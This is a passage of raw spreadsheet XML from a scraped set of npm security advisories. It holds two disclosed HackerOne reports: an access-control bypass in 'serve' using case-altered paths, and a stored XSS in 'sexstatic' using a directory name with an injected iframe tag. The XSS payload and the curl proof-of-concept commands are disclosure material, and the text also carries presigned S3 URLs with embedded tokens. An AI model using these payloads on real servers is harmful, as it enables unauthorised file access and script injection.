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190118/sideprojects/scraper_nsp/csv/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="980" yWindow="440" windowWidth="27820" windowHeight="17560" tabRatio="500"/>
  </bookViews>
  <sheets>
    <sheet name="out"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608" i="1" l="1"/>
  <c r="R607" i="1"/>
  <c r="R60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2" i="1"/>
  <c r="Q48" i="1"/>
  <c r="Q49" i="1"/>
  <c r="Q50" i="1"/>
  <c r="Q51" i="1"/>
  <c r="Q52" i="1"/>
  <c r="Q5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2"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B608" i="1"/>
  <c r="B609" i="1"/>
  <c r="L50" i="1"/>
  <c r="L28" i="1"/>
  <c r="L27" i="1"/>
  <c r="L26" i="1"/>
  <c r="L53" i="1"/>
  <c r="L51" i="1"/>
  <c r="L52" i="1"/>
  <c r="L47" i="1"/>
  <c r="L39" i="1"/>
  <c r="L48" i="1"/>
  <c r="L49" i="1"/>
  <c r="L36" i="1"/>
  <c r="L54" i="1"/>
  <c r="L45" i="1"/>
  <c r="L37" i="1"/>
  <c r="L46" i="1"/>
  <c r="L40" i="1"/>
  <c r="L42" i="1"/>
  <c r="L43" i="1"/>
  <c r="L32" i="1"/>
  <c r="L38" i="1"/>
  <c r="L41" i="1"/>
  <c r="L44" i="1"/>
  <c r="L35" i="1"/>
  <c r="L55" i="1"/>
  <c r="L56" i="1"/>
  <c r="L57" i="1"/>
  <c r="L58" i="1"/>
  <c r="L59" i="1"/>
  <c r="L23" i="1"/>
  <c r="L34" i="1"/>
  <c r="L33" i="1"/>
  <c r="L29" i="1"/>
  <c r="L31" i="1"/>
  <c r="L30" i="1"/>
  <c r="L25" i="1"/>
  <c r="L24" i="1"/>
  <c r="L60" i="1"/>
  <c r="L61" i="1"/>
  <c r="L62" i="1"/>
  <c r="L22" i="1"/>
  <c r="L21" i="1"/>
  <c r="L63" i="1"/>
  <c r="L64" i="1"/>
  <c r="L65" i="1"/>
  <c r="L66" i="1"/>
  <c r="L67" i="1"/>
  <c r="L68" i="1"/>
  <c r="L69" i="1"/>
  <c r="L16" i="1"/>
  <c r="L20" i="1"/>
  <c r="L70" i="1"/>
  <c r="L19" i="1"/>
  <c r="L17" i="1"/>
  <c r="L71" i="1"/>
  <c r="L15" i="1"/>
  <c r="L18" i="1"/>
  <c r="L72" i="1"/>
  <c r="L14" i="1"/>
  <c r="L13" i="1"/>
  <c r="L73" i="1"/>
  <c r="L12" i="1"/>
  <c r="L74" i="1"/>
  <c r="L11" i="1"/>
  <c r="L10" i="1"/>
  <c r="L9" i="1"/>
  <c r="L8" i="1"/>
  <c r="L7" i="1"/>
  <c r="L75" i="1"/>
  <c r="L76" i="1"/>
  <c r="L77" i="1"/>
  <c r="L78" i="1"/>
  <c r="L79" i="1"/>
  <c r="L80" i="1"/>
  <c r="L81" i="1"/>
  <c r="L82" i="1"/>
  <c r="L83" i="1"/>
  <c r="L84" i="1"/>
  <c r="L85" i="1"/>
  <c r="L86" i="1"/>
  <c r="L87" i="1"/>
  <c r="L88" i="1"/>
  <c r="L4" i="1"/>
  <c r="L89" i="1"/>
  <c r="L90" i="1"/>
  <c r="L91" i="1"/>
  <c r="L5" i="1"/>
  <c r="L6" i="1"/>
  <c r="L92" i="1"/>
  <c r="L93" i="1"/>
  <c r="L94" i="1"/>
  <c r="L95" i="1"/>
  <c r="L3"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2"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B612" i="1"/>
  <c r="B611" i="1"/>
  <c r="B610" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="5230" uniqueCount="3376">
  <si>
    <t>title</t>
  </si>
  <si>
    <t>link</t>
  </si>
  <si>
    <t>reportedAt</t>
  </si>
  <si>
    <t>moduleName</t>
  </si>
  <si>
    <t>moduleLink</t>
  </si>
  <si>
    <t>vulnerableVersion</t>
  </si>
  <si>
    <t>patchedVersion</t>
  </si>
  <si>
    <t>severity</t>
  </si>
  <si>
    <t>rate</t>
  </si>
  <si>
    <t>hackerOneLink</t>
  </si>
  <si>
    <t>isPrivate</t>
  </si>
  <si>
    <t>vulnerability_information_html</t>
  </si>
  <si>
    <t>created_at</t>
  </si>
  <si>
    <t>disclosed_at</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>impact</t>
  </si>
  <si>
    <t>slicedDescription</t>
  </si>
  <si>
    <t>slicedImpact</t>
  </si>
  <si>
    <t>[serve] Directory listing and File access even when they have been set to be ignored</t>
  </si>
  <si>
    <t>/advisories/672</t>
  </si>
  <si>
    <t>2018-06-01T22:41:59.842+00:00</t>
  </si>
  <si>
    <t>serve</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serve</t>
  </si>
  <si>
    <t>&lt;=6.5.3</t>
  </si>
  <si>
    <t>&gt;=7.0.0</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/330650.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report a vulnerability in &lt;strong&gt;serve&lt;/strong&gt; on macOS.&lt;br&gt;
It allows listing directory and reading local files on the target server.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; serve&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 6.5.3&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/serve&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;p&gt;Ever wanted to share a project on your network by running just a command? Then this module is exactly what you&amp;#39;re looking for: It provides a neat interface for listing the directory&amp;#39;s contents and switching into sub folders.&lt;/p&gt;
&lt;p&gt;In addition, it&amp;#39;s also awesome when it comes to serving static sites!&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;On macOS:&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Install &lt;strong&gt;serve&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;$ npm i serve&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create an application that uses &lt;strong&gt;serve&lt;/strong&gt; for file serving listing and set a few folders and files in the &lt;code&gt;ignore&lt;/code&gt; config.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;const serve = require(&amp;#39;serve&amp;#39;)
const server = serve(__dirname, {
      port: 6060,
      ignore: [&amp;#39;sec&amp;#39;, &amp;#39;secret.html&amp;#39;]
})
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Run the app&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;$ node app.js&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Now, the current directory will be served by this module on port &lt;code&gt;6060&lt;/code&gt; with the exception of folder &lt;code&gt;sec&lt;/code&gt; and file &lt;code&gt;secret.html&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If we try to request these ignored files/directories, we get a &lt;code&gt;Not Found&lt;/code&gt; error&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl --path-as-is &amp;#39;http://127.0.0.1:6060/secret.html&amp;#39;
Not Found
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or if we replace &lt;code&gt;e&lt;/code&gt; character with URI encoded form &lt;code&gt;%65&lt;/code&gt;, it still be ignored:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl --path-as-is &amp;#39;http://127.0.0.1:6060/s%65cret.html&amp;#39;
Not Found
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;However, I found a way to access that file by using uppercase format.&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl --path-as-is &amp;#39;http://127.0.0.1:6060/sECret.html&amp;#39;
This is secret content!!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To list an &lt;em&gt;ignored&lt;/em&gt; directory:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;http://127.0.0.1:6060/sEc&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="serve.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/279/417/ba78749a5cf433672a9ac793509deec5110eed57/serve.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJHH6RMOAD4EIQLKQ%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDIIhFjlYcf4BS4hLpCK3A%2BOieWNn%2FyqEj9RRI8diizuantyyunusgwllWuuENEG1mgik5l3yg0s2yTYNl4sMAkRtdZKdRI9RATO4rMjHN1sU8W2NGKIoSgqbt%2FAia%2Brr0d7noQ44WuksMBn%2BSIpiewjwGTGz3ksetERrgJi25nMlpX%2Bz%2F0bzXh9LgiP265BcOIDEVw680KDGgtox%2B2uQUvEDlQmQlDb5ib1s83eztve%2Brh%2Fm00D%2F7ywjgmyHTRSdBgdbTa8N8mmDO7Tqv4KO2S5HJhJrk9rQJr3sQzDbjnNacI47FQ72gIl7p5Nbiv0xJ8lObxNXq1130VO07Iawm3HWae769c3bmlK4IfdIwEgympUL%2Bavv3pyiiNsdyQBsSJZGWbX5XD4F1g3X1xlwbPEa3a4KD0zlgOe2ZkzazrhO2B6Wjv%2FDk3SbnkQ7QHtGGEmRO8gOuQPqF7tWdzaYo%2B6EFw6Pm12z70UFOW59jpBa5FirKyzAIb2XpFP6WbOrnhzqiZ7yXI0NuWqzSaGgGVjFkShqMXCODuZ0rUC9ncGz9fk9seS%2FEy4D4%2FrT1uUkpuzIOykXiD3qFgTe%2FqBVLjwx9DJNz74og8Hs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=b50d3414d6104f796e1b6a228f9f785a6654a614ce64ae33005698de282939db" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/279/417/ba78749a5cf433672a9ac793509deec5110eed57/serve.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJHH6RMOAD4EIQLKQ%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDIIhFjlYcf4BS4hLpCK3A%2BOieWNn%2FyqEj9RRI8diizuantyyunusgwllWuuENEG1mgik5l3yg0s2yTYNl4sMAkRtdZKdRI9RATO4rMjHN1sU8W2NGKIoSgqbt%2FAia%2Brr0d7noQ44WuksMBn%2BSIpiewjwGTGz3ksetERrgJi25nMlpX%2Bz%2F0bzXh9LgiP265BcOIDEVw680KDGgtox%2B2uQUvEDlQmQlDb5ib1s83eztve%2Brh%2Fm00D%2F7ywjgmyHTRSdBgdbTa8N8mmDO7Tqv4KO2S5HJhJrk9rQJr3sQzDbjnNacI47FQ72gIl7p5Nbiv0xJ8lObxNXq1130VO07Iawm3HWae769c3bmlK4IfdIwEgympUL%2Bavv3pyiiNsdyQBsSJZGWbX5XD4F1g3X1xlwbPEa3a4KD0zlgOe2ZkzazrhO2B6Wjv%2FDk3SbnkQ7QHtGGEmRO8gOuQPqF7tWdzaYo%2B6EFw6Pm12z70UFOW59jpBa5FirKyzAIb2XpFP6WbOrnhzqiZ7yXI0NuWqzSaGgGVjFkShqMXCODuZ0rUC9ncGz9fk9seS%2FEy4D4%2FrT1uUkpuzIOykXiD3qFgTe%2FqBVLjwx9DJNz74og8Hs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=b50d3414d6104f796e1b6a228f9f785a6654a614ce64ae33005698de282939db" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;macOS High Sierra 10.13.3&lt;/li&gt;
&lt;li&gt;node v8.10.0&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;li&gt;Chrome Version 65.0.3325.162 (Official Build) (64-bit)&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;It bypasses the ignore files/directories feature and allows an attacker to read a file or list the directory that the victim has not allowed access to.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-28T06:51:07.059Z</t>
  </si>
  <si>
    <t>2018-05-31T19:18:43.353Z</t>
  </si>
  <si>
    <t>It bypasses the ignore files/directories feature and allows an attacker to read a file or list the directory that the victim has not allowed access to.</t>
  </si>
  <si>
    <t xml:space="preserve">report vulnerability serve macOS. allows listing directory reading local files target server.  Module  module name  serve version  6.5.3 npm page  https //www.npmjs.com/package/serve  Module Description  Ever wanted share project network running just command? module exactly you"re looking  provides neat interface listing directory"s contents switching sub folders.  addition, it"s awesome when comes serving static sites   Vulnerability  Steps Reproduce   macOS    Install serve    $ npm serve   Create application uses serve file serving listing set few folders files ignore config.  const serve = require("serve") const server = serve(__dirname, {       port  6060,       ignore  ["sec", "secret.html"] })   Run app   $ node   Now, current directory will served module port 6060 exception folder sec file try request ignored files/directories, Not Found error  $ curl   path "http //127.0.0.1 6060/secret.html" Not Found  replace e character URI encoded form %65, ignored  $ curl   path "http //127.0.0.1 6060/s%65cret.html" Not Found   However, found access file using uppercase format.  $ curl   path "http //127.0.0.1 6060/sECret.html" secret content    list ignored directory   http //127.0.0.1 6060/sEc    Supporting Material/References    macOS High Sierra 10.13.3 node v8.10.0 npm 5.6.0 Chrome Version 65.0.3325.162 (Official Build) (64 bit)   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  bypasses ignore files/directories feature allows attacker read file list directory victim not allowed access to. </t>
  </si>
  <si>
    <t>bypasses ignore files/directories feature allows attacker read file list directory victim not allowed access to.</t>
  </si>
  <si>
    <t>[sexstatic] HTML injection in directory name(s) leads to Stored XSS when malicious file is embed with &lt;iframe&gt; element used in directory name</t>
  </si>
  <si>
    <t>/advisories/671</t>
  </si>
  <si>
    <t>2018-06-01T22:12:32.786+00:00</t>
  </si>
  <si>
    <t>sexstatic</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sexstatic</t>
  </si>
  <si>
    <t>All</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/328210.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report HTML Injection vulnerability in &lt;code&gt;sexstatic&lt;/code&gt; module. It is possible to use HTML in directory names, which might lead to run arbitrary JavaScript code in the browser.&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; sexstatic&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.6.2&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;a title="https://www.npmjs.com/package/sexstatic" href="/redirect?signature=03cc8443ccb8849a3761c015d2fa5b97563d7953&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fsexstatic" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/sexstatic&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="module-description"&gt;Module Description&lt;/h3&gt;
&lt;p&gt;A simple static file server middleware. Use it with a raw http server, express/connect, or flatiron/union!&lt;/p&gt;
&lt;p&gt;Also adds the ability to arbitrarily modify output HTML for whatever reason. And adding additional: simple url -&amp;gt; string handlers simple url -&amp;gt; function handlers&lt;/p&gt;
&lt;p&gt;see opts.extras if you wanna get what i&amp;#39;m talking about&lt;/p&gt;
&lt;p&gt;I may or may not extend this with further addons in the future to suit my needs.&lt;/p&gt;
&lt;h3 id="module-stats"&gt;Module Stats&lt;/h3&gt;
&lt;p&gt;Stats&lt;br&gt;
4 downloads in the last day&lt;br&gt;
29 downloads in the last week&lt;br&gt;
158 downloads in the last month&lt;/p&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;sexstatic&lt;/code&gt; can be used as static file server and presents directory index in the browser. Output is correctly sanitized against any attempts of HTML or JavaScript injection, due to sanitization done in &lt;code&gt;sexstatic/lib/sexstatic/showdir.js&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// sexstatic/lib/sexstatic/showdir.js, line 132&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;displayName&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;he&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;isDir&lt;/span&gt;&lt;span class="p"&gt;)?&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;// TODO: use stylessheets?&lt;/span&gt;
    &lt;span class="nx"&gt;html&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;tr&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;&amp;lt;td&amp;gt;&amp;lt;code&amp;gt;(&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;permsToString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;)&amp;lt;/code&amp;gt;&amp;lt;/td&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;&amp;lt;td style=&amp;quot;text-align: right; padding-left: 1em&amp;quot;&amp;gt;&amp;lt;code&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;sizeToString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nx"&gt;humanReadable&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;si&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/code&amp;gt;&amp;lt;/td&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;&amp;lt;td style=&amp;quot;padding-left: 1em&amp;quot;&amp;gt;&amp;lt;a href=&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;href&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;displayName&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/a&amp;gt;&amp;lt;/td&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;&amp;lt;/tr&amp;gt;\n&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, the same sanitization is missing from this part:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// sexstatic/lib/sexstatic/showdir.js, line 106&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;&amp;lt;!doctype html&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;&amp;lt;html&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;  &amp;lt;head&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;    &amp;lt;meta charset=&amp;quot;utf-8&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;    &amp;lt;title&amp;gt;Index of &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;pathname&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;/title&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;  &amp;lt;/head&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;  &amp;lt;body&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="s1"&gt;&amp;#39;&amp;lt;h1&amp;gt;Index of &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;pathname&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;/h1&amp;gt;&amp;#39;&lt;/span&gt;
        &lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;\n&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;\n&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;pathname&lt;/code&gt; variable is used without sanitization.&lt;br&gt;
This allows malicious user to use valid HTML code as directory name. &lt;br&gt;
Below I present complete attack scenario with this vulnerability.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;sexstatic&lt;/code&gt; module:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install sexstatic
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;in the directory which will be used as root for &lt;code&gt;sexstatic&lt;/code&gt;, create directory with following name: &lt;code&gt;&amp;quot;&amp;gt;&amp;lt;iframe src=&amp;quot;malware_frame.html&amp;quot;&amp;gt;/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;in created directory, create file &lt;code&gt;malware_frame.html&lt;/code&gt; with following content:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="c"&gt;&amp;lt;!-- malware_frame.html --&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;charset=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;utf8&amp;quot;&lt;/span&gt; &lt;span class="nt"&gt;/&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;Frame embeded with malware downloader :P&lt;span class="nt"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;p&amp;gt;&lt;/span&gt;iframe element with malicious code&lt;span class="nt"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;script&amp;gt;&lt;/span&gt;
        &lt;span class="nx"&gt;alert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Uh oh, I am bad, bad malware!!!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run &lt;code&gt;sexstatic&lt;/code&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/sexstatic/lib/sexstatic.js -p 8080
sexstatic serving /home/rafal.janicki/playground/hackerone/Node at http://0.0.0.0:8080
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;go to &lt;code&gt;http://localhost:8080&lt;/code&gt; to see directory index:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="sexstatic_xss_1.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/274/226/6c086ce3cc705e50964282ec247d7cd9b5e905f1/sexstatic_xss_1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIFUA5MSDI66KW5XA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDIIHfzqjWGgOddDrOCK3A2idI%2BbZfsMDl3lwr5jdUjH2BaUaGDKWWtgxjcMYsP%2BGTIa1K4lEyrd%2B1sR1kDGQwCkOK3zD7hzLSaiArqdwaAtF%2FnaT7ivXhsjcNlMhvfLoRuJRT%2BdwCSMWvgD08rySEggBRZHdhvQ9JY1U0PYjv7DHUDK%2FWkgqN0hgH%2FTB41ceFwsNqM%2BxYaiWi3PQqv0D2JA2udMzfboOgNGUNtvpcrxR3moFfC6pQIJx0q24hx7qntVhq3JgbRSg9d103%2BuVM9uzEl%2Fuh3IgOtzNkN7QVE5agNKGRBWXmzrjmrt0O%2B1x2J2AnC07%2FfOCHOrBsd3JmnXUED%2FPcofkmV36uKXeYlPzMCL5tA%2Bb%2FETHQyaXtYKLmRQgTUnpf9uGvgY7%2Btlc6BXg1v8wr2dHgjuK6ZG39nxv780vJlwlaF%2FdhnTo2bY3co36fFN98oYJi3zQRttqczZhf%2FyXzP5UnvQz9hJ%2FDQyOx3hkAJJjw5BYs%2FAeeTzl3sHbZoXPYPs3UfKqNIyvEJ0lCrwOC%2F%2BAcU%2BNeMG279sVplrJu%2BIyXS1uA2qa7%2F6imnRQlbLh6iGQTwK5ID%2B3GX3PUeu398QouMHs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=0e9435a1608b2c3aa1d10b3b7eb5a0ffa054f19616e8152ed0847888dfe924ce" data-attachment-type="image/png"&gt;&lt;img 